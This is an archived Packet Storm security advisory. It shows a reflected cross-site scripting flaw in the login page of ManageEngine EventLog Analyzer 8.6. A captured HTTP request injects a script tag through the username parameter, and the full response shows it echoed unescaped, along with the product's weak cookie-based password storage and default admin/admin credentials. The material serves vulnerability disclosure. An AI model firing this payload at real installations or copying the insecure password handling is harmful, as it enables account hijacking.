exploit the possibilities

ManageEngine EventLog Analyzer 8.6 Cross Site Scripting

ManageEngine EventLog Analyzer 8.6 Cross Site Scripting
Posted Jan 17, 2014
Authored by Asheesh Kumar Mani Tripathi

ManageEngine EventLog Analyzer version 8.6 suffers from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | a8d185b6f6ebe8813ec90c26d495315f

ManageEngine EventLog Analyzer 8.6 Cross Site Scripting

Change Mirror Download
================================================================================================================================================================

ManageEngine EventLog Analyzer 8.6 cross-site scripting (XSS) Vulnerability
================================================================================================================================================================


#Date- 12/12/2013

# code by Asheesh kumar Mani Tripathi



# Credit by Asheesh Anaconda



#Vulnerbility
ManageEngine EventLog Analyzer 8.6 is prone to an cross-site scripting (XSS) Vulnerability because the application fails to properly
sanitize user-supplied input

#Impact
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities


========================================================================================================================

Request
========================================================================================================================


GET /event/j_security_check?forChecking=null&j_username=aad307"><script>alert(1)</script>509283f38eba1c193&j_password=a&domains=Choose&loginButton=Login&optionValue=hide HTTP/1.1
Host: 172.28.154.78:8400
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://172.28.154.78:8400/event/index3.do
Cookie: panelState=expanded; calselection=custom; tooltipDiv=block; JSESSIONID=946D162CF15C188883BA1750E38F7A7B
Connection: keep-alive


========================================================================================================================

Response
========================================================================================================================
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
isLoginPage: true
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 17 Dec 2013 19:36:08 GMT
Content-Length: 17880



<link href="styles/newTheme.css" rel="stylesheet" type="text/css" />
<!-- link href="styles/calendar.css" rel="stylesheet" type="text/css"-->
<script type="text/javascript" language="JavaScript" src="javascript/sacommon.js"></script>
<script type="text/javascript" language="JavaScript" src="javascript/jquery-1.3.2.js"></script>
<script type="text/javascript" language="JavaScript" src="javascript/jquery-utils.js"></script>
<script type="text/javascript" language="JavaScript" src="javascript/jquery.cookie.js"></script>
<script type="text/javascript" language="JavaScript" src="javascript/jquery-ui.js" ></script>
<script type="text/javascript" language="JavaScript" src="javascript/elascript.js"></script>
<script type="text/javascript" language="JavaScript" src="javascript/setLayerPosition.js"></script>
<script type="text/javascript" language="JavaScript" src="javascript/LAUtils.js"></script>
<script type="text/javascript" language="JavaScript" src="javascript/json2.js"></script>
<script type="text/javascript" language="JavaScript" src="javascript/jstorage.js"></script>





<!DOCTYPE html>
<html>
<head>

<title>ManageEngine EventLog Analyzer 8</title>
<LINK REL="SHORTCUT ICON" HREF="images/favicon.ico">
<script>


function userType(ADAuthEnabled)
{
if(ADAuthEnabled == 'true')
{
//document.getElementById('loginOption').style.display='';
document.getElementById('domainLists').style.visibility="visible";
document.getElementById('selectdomiain').style.visibility="visible";
} else {
document.loginForm.domain.disabled=true;
}
//loadLogin();
var id = document.getElementById("loginFirst");


eval("id.style.visibility = 'visible';");


}

var xmlHttp;

function clearLoginInfo()
{
xmlHttp=GetXmlHttpObject()
if (xmlHttp==null)
{
alert ("Browser does not support HTTP Request")
return
}
var url="login.do?requestid=false"//No I18N
url=url+"&sid="+Math.random()//No I18N
xmlHttp.onreadystatechange=processReqChange
xmlHttp.open("GET",url,true)
xmlHttp.send(null)
}

function processReqChange()
{
// only if xmlHttp shows "complete"
if (xmlHttp.readyState == 4)
{
// only if "OK"
if (xmlHttp.status == 200)
{
var value = xmlHttp.responseText;
var id = document.getElementById("loginFirst");
eval("id.style.visibility = 'hidden';");
}
else
{
alert("There was a problem retrieving the data:\n" + xmlHttp.statusText);//No I18N
}
}
}

function dynamicprocessReqChange()
{
// only if xmlHttp shows "complete"
if (xmlHttp.readyState == 4)
{
// only if "OK"
if (xmlHttp.status == 200)
{
var value = xmlHttp.responseText;
if(value != null){
populatedomains(value);

}
}
else
{
alert("There was a problem retrieving the data:\n" + xmlHttp.statusText);//No I18N
}
}
}

function populatedomains(domainslist)
{
var domainsforthisuser = domainslist.split(",");
var numberofdomains = domainsforthisuser.length;
document.loginForm.domains.options.length = 0;
for(var i=0;i<numberofdomains;i++)
{
document.forms["loginForm"].domains.options[i] =new Option(domainsforthisuser[i],domainsforthisuser[i]);
}
authenticationType();
}


function GetXmlHttpObject()
{
var objXMLHttp=null
if (window.XMLHttpRequest) //For browser compatibility - Mozilla,FF
{
objXMLHttp=new XMLHttpRequest()
}
else if (window.ActiveXObject) //For browser compatibility - IE
{
objXMLHttp=new ActiveXObject("Microsoft.XMLHTTP")
}
return objXMLHttp
}

function dynamicDomains(usernameObject )
{
var username = usernameObject.value;
xmlHttp=GetXmlHttpObject()
if (xmlHttp==null)
{
alert ("Browser does not support HTTP Request")
return
}
var url="/domainAuth?username="+username//No I18N
xmlHttp.onreadystatechange=dynamicprocessReqChange
xmlHttp.open("GET",url,true)
xmlHttp.send(null);
}

function loadLogin()
{
//alert("loadLogin()")
document.loginForm.j_username.value="";
//document.login.j_username.focus();
init = (document.cookie).indexOf("username");
if(init != -1 )
{
//alert("inside getCookie.init");
userlen = "username".length; //No I18N
beginIndex = ((document.cookie).indexOf("username")+userlen);
endIndex = (document.cookie).indexOf(";",beginIndex);
if(endIndex == -1)
{
endIndex = (document.cookie).length;
}
username=(document.cookie).substring(beginIndex+1,endIndex);
//alert("user:"+username);

startIndex = ((document.cookie).indexOf("password")+"password".length);//No I18N
endInd = (document.cookie).indexOf(";",startIndex);
if(endInd == -1)
{
endInd=(document.cookie).length;
}
//Decrypting encrypted password..
var encPassword=(document.cookie).substring(startIndex+1,endInd);
password = decryptPassword(encPassword);
//alert(password);

var ssoStart = ((document.cookie).indexOf("singlesignon")+"singlesignon".length);//No I18N
var ssoEnd = (document.cookie).indexOf(";",ssoStart);
if(ssoEnd == -1)
{
ssoEnd=(document.cookie).length;
}
var singlesignon = (document.cookie).substring(ssoStart+1,ssoEnd);
//alert(singlesignon);

document.loginForm.j_username.value=username;
document.loginForm.j_password.value=password;
document.loginForm.checkbox.checked=false;

//alert(username + password+singlesignon);
if(singlesignon=="true" && username!="" && password!="")
{
//alert('1');
document.loginForm.checkbox.checked=true;
//debugger;
if(document.loginForm.forChecking.value!="Invalid loginName/password")
{
document.loginForm.forChecking.value="";
if ("null" == 'null')
{
document.loginForm.submit();
}
}
else
{
document.loginForm.j_username.value="";
document.loginForm.j_password.value="";
document.loginForm.checkbox.checked=false;
document.loginForm.j_username.focus();
}
}

}
else
{
//alert('0');
document.loginForm.j_username.focus();
}
}

function encryptPassword(textPassword)
{
var num_out = "";
var str_in = escape(textPassword);
for(i = 0; i < str_in.length; i++)
{
num_out += str_in.charCodeAt(i) - 23;
}
return num_out;
}

function decryptPassword(encPassword)
{
var str_out = "";
var num_out = encPassword;
for(i = 0; i < num_out.length; i += 2)
{
num_in = parseInt(num_out.substr(i,[2])) + 23;
num_in = unescape('%' + num_in.toString(16));
str_out += num_in;
}
var textPassword = unescape(str_out);
return textPassword ;
}
function authenticationType()
{
var seldomain = document.loginForm.domains.value;

if(seldomain.trim() == 'Local Authentication' || seldomain.trim() == 'Choose')
{

if(seldomain.trim() == 'Choose' && jQuery('#domainLists').css('visibility') == 'visible'){

document.loginForm.AUTHRULE_NAME.value='ADAuthenticator'; //No I18N

document.loginForm.domainName.disabled=false;

document.loginForm.domainName.value=seldomain;

document.loginForm.domain.disabled=false;

document.loginForm.domain.value=seldomain;
}
else
{

document.loginForm.domain.disabled=true;
document.loginForm.AUTHRULE_NAME.disabled=true; //No I18N
document.loginForm.domainName.disabled=true;
}
}
else if(seldomain=='radius')
{
document.loginForm.AUTHRULE_NAME.value='RadiusAuthenticator'; //No I18N
document.loginForm.domain.disabled=false;
document.loginForm.domain.value=seldomain;
}
else
{
document.loginForm.AUTHRULE_NAME.value='ADAuthenticator'; //No I18N
document.loginForm.domainName.disabled=false;
document.loginForm.domainName.value=seldomain;
document.loginForm.domain.disabled=false;
document.loginForm.domain.value=seldomain;
}


}
function loginOptions()
{
var optionValue = document.loginForm.optionValue.value;

if(optionValue == 'show')
{
document.getElementById('domainLists').style.visibility='visible';
document.getElementById('selectdomiain').style.visibility='visible';
//document.getElementById('loginOption').innerHTML="<a title='Hide' href='javascript:loginOptions()'>Options <<</a>";
document.loginForm.optionValue.value='hide';//No I18N
}
else
{
document.getElementById('domainLists').style.visibility='hidden';
document.getElementById('selectdomiain').style.visibility='hidden';
//document.getElementById('loginOption').innerHTML="<a title='Show' href='javascript:loginOptions()'>Options >></a>";
document.loginForm.optionValue.value='show';//No I18N
}
}

jQuery(document).ready(function() {

var isIE = jQuery.browser.msie;
if(isIE)
{
jQuery('.placeholderUsername').show();
jQuery('.placeholderPassword').show();

jQuery('#username').keypress(function(){
if(jQuery(this).val() == '' || jQuery(this).val() == 'Password')
{
jQuery('.placeholderPassword').hide();
jQuery('.placeholderUsername').hide();

}
});
jQuery('#username').click(function(){
jQuery('.placeholderUsername').hide();
jQuery('.placeholderPassword').hide();
});
jQuery('#username').focus(function(){
jQuery('.placeholderUsername').hide();
});
jQuery('#password').focus(function(){
jQuery('.placeholderPassword').hide();
});
jQuery('.placeholderUsername').click(function(){
jQuery(this).hide();
jQuery('#username').focus();
});
jQuery('.placeholderPassword').click(function(){
jQuery(this).hide();
jQuery('#password').focus();
});
jQuery('#username').blur(function(){
if(jQuery(this).val() == '')
{
jQuery('.placeholderUsername').show();
}
if(jQuery('#password').val() == '')
{
jQuery('.placeholderPassword').show();
}
else
{
jQuery('.placeholderPassword').hide();
}
});
jQuery('#password').blur(function(){
if(jQuery(this).val() == '')
{
jQuery('.placeholderPassword').show();
}
if(jQuery('#username').val() == '')
{
jQuery('.placeholderUsername').show();
}

});
}

});


</script>
</head>


<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0" onload="userType('false');" style="background-color:#FFF" scroll="yes" >
<script language="JavaScript" type="text/JavaScript">
function check()
{
x = document.loginForm
if (x.j_username.value == "" || x.j_username.value =="User Name")
{
document.getElementById('message').innerHTML ='Please enter a User Name';
return false;
}

if ( x.j_password.value == "" || x.j_password.value =="Password")
{
document.getElementById('message').innerHTML ='Please enter password';
return false;
}
//Convert the username to lowercase to overcome the login issue in mickey
x.j_username.value=x.j_username.value.toLowerCase();


// this is for 'Keep me signed on'
var expDate = new Date();
var thisCookie;
if(x.checkbox.checked)
{
expDate.setTime(expDate.getTime()+(24*60*60*1000*365));
document.cookie="username= "+x.j_username.value+";expires= "+((expDate).toGMTString());
//Encrypting the password for Cookie
var textPassword = x.j_password.value ;
var encPassword = encryptPassword(textPassword);
document.cookie="password= "+ encPassword +";expires= "+((expDate).toGMTString());
var sso = "true";
document.cookie="singlesignon= "+ sso +";expires= "+((expDate).toGMTString());
//alert("cookie:"+document.cookie);
//console.debug("cockie="+document.cookie);
}
else
{
expDate.setTime(expDate.getTime());
document.cookie="username= "+x.j_username.value+";expires= "+((expDate).toGMTString());
document.cookie="password= "+x.j_password.value+";expires= "+((expDate).toGMTString());
document.cookie="singlesignon= 'false';expires= "+((expDate).toGMTString());
//alert("else cookie:"+document.cookie);

}

}





</script>
<form name="loginForm" action="j_security_check" method="post" onSubmit="return check()" >

<input type="hidden" name="AUTHRULE_NAME" value="Authenticator">

<input type="hidden" name="domainName" disabled value="Local">

<div id="loginmain">

<div id="login">
<div class="loginmessage">
<h1>Sign In here</h1>
<div id="message" class="error2"></div>


<input type="hidden" name="forChecking" value="No such account configured for the user [aad307"><script>alert(1)</script>509283f38eba1c193]">

<SCRIPT LANGUAGE="javascript" type="text/javascript">
document.getElementById('message').innerHTML ='Invalid loginname / password';

</SCRIPT>




</div>
<div class="loginbox">
<div class="login_input1"> <span class="usericon">&nbsp;</span>
<div class="placeholderUsername">User Name</div>
<input type="text" tabindex="10" name="j_username" id="username" onchange='dynamicDomains(this)' class="txtbox2" placeholder="User Name" />

</div>
<div class="login_input"> <span class="passicon">&nbsp;</span>
<div class="placeholderPassword">Password</div>
<input type="password" tabindex="20" name="j_password" id="password" class="txtbox2" placeholder="Password" />


</div>
</div>

<div id="selectdomiain" style="visibility:hidden">
<div id="domainLists" style="visibility:hidden">

<select name="domains" onChange='authenticationType()'>
<option value="Choose">-- Choose --</option>

<option value="Local Authentication">Local Authentication</option>
</select>
<input name="domain" type="hidden" value="">
</div></div>

<div class="btn">

<div class="remember">
<input type="checkbox" name="checkbox" id="checkbox" />
<label class="txt">Keep me signed in</label>
</div>
<div class="login_bnt">
<input name="loginButton" type="submit" style="width:80" class="loginbtn" value="Login" onclick="authenticationType()">
<input name="optionValue" type="hidden" value="hide">
</div>
</div>
<div id="loginFirst" class="alignC" style="top:300px; position:absolute;width:400px;">
<span id="firstTimeInfo" class="firstTimeMgs">First time users use '<b>admin</b>' / '<b>admin</b>' to login&nbsp;&nbsp;&nbsp;<a title="Do not show login details again" onclick="clearLoginInfo()" href="javascript:void(0);">X</a>&nbsp;</span>
</div>
</div>

<div id="login_log">
<div id="logobg">
<div id="logo"><img src="images/eventlog_login_logo.png" alt="EventLog Analyzer" /></div>
<div class="loginCaption">Unlock the Real Value of your Machine Generated Logs</div>
</div>
</div>

</div>
<div id="copyright">The&nbsp;<a href="http://www.eventloganalyzer.com" target="_blank">SIEM software</a> from&nbsp;<a href="http://www.manageengine.com" target="_blank" title="www.manageengine.com">ManageEngine </a>&nbsp;© 2013&nbsp;<a href="http://www.manageengine.com" target="_blank" title="www.manageengine.com">ZOHO Corp.</a>&nbsp;All Rights Reserved </div>







<script>
loadLogin();
</script>


</form>

<map name="Map">
<area shape="rect" coords="2,2,141,37" href="http://www.netflowanalyzer.com" target="_blank" title="http://www.netflowanalyzer.com">
<area shape="rect" coords="149,3,289,38" href="http://www.desktopcentral.com" target="_blank" title="http://www.desktopcentral.com">
<area shape="rect" coords="296,3,437,38" href="http://www.fwanalyzer.com" target="_blank" title="http://www.fwanalyzer.com">
<area shape="rect" coords="442,2,582,36" href="http://www.opmanager.com" target="_blank" title="http://www.opmanager.com">
<area shape="rect" coords="589,2,736,36" href="http://www.wifimanager.com" target="_blank" title="http://www.wifimanager.com">
<area shape="rect" coords="460,42,515,54" href="https://store.manageengine.com" target="_blank" title="https://store.manageengine.com">
</map>
</body>

</html>


<script language="JavaScript">
function getieversion()
{
var ua = window.navigator.userAgent
var msie = ua.indexOf ( "MSIE " )
if ( msie > 0 ) {return parseInt ( ua.substring ( msie+5, ua.indexOf ( ".", msie ) ) );}
else {return 6 ;} //tmp kludge to resolve other browsers
}
</script>

<script>

if(getieversion()<=5 )
{
document.loginForm.j_username.disabled = true;
document.loginForm.j_password.disabled = true;
document.loginForm.loginButton.disabled = true;

document.loginForm.j_username.className = "txtboxDisabled";
document.loginForm.j_password.className = "txtboxDisabled";
document.loginForm.loginButton.className= "txtboxDisabled";
alert("Sorry, we do not Support your Internet Explorer version "+getieversion()+" !!!");//No I18N
}

var AcceptsCookiesCheck = false;

if(eval("document.cookie"))
{
if(document.cookie == '')
{
document.cookie = 'AcceptsCookiesCheck=yes';
if(document.cookie.indexOf('AcceptsCookiesCheck=yes') != -1)
{
AcceptsCookiesCheck = true;
}
else
{
alert("Web Browser should have both Javascript and Cookies enabled!");
}
}
}
jQuery.cookie("panelState","expanded");//No I18N
jQuery.cookie("calselection","custom");//No I18N
jQuery.cookie("tooltipDiv","block");//No I18N
//added for search - Pravin
jQuery(document).ready(function()
{
//this will remove all the keys which were saved by storage ...
jQuery.jStorage.flush();
});
</script>

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    22 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    2 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    50 Files
  • 6
    Feb 6th
    24 Files
  • 7
    Feb 7th
    15 Files
  • 8
    Feb 8th
    6 Files
  • 9
    Feb 9th
    1 Files
  • 10
    Feb 10th
    1 Files
  • 11
    Feb 11th
    22 Files
  • 12
    Feb 12th
    25 Files
  • 13
    Feb 13th
    16 Files
  • 14
    Feb 14th
    32 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    10 Files
  • 17
    Feb 17th
    2 Files
  • 18
    Feb 18th
    27 Files
  • 19
    Feb 19th
    32 Files
  • 20
    Feb 20th
    15 Files
  • 21
    Feb 21st
    17 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close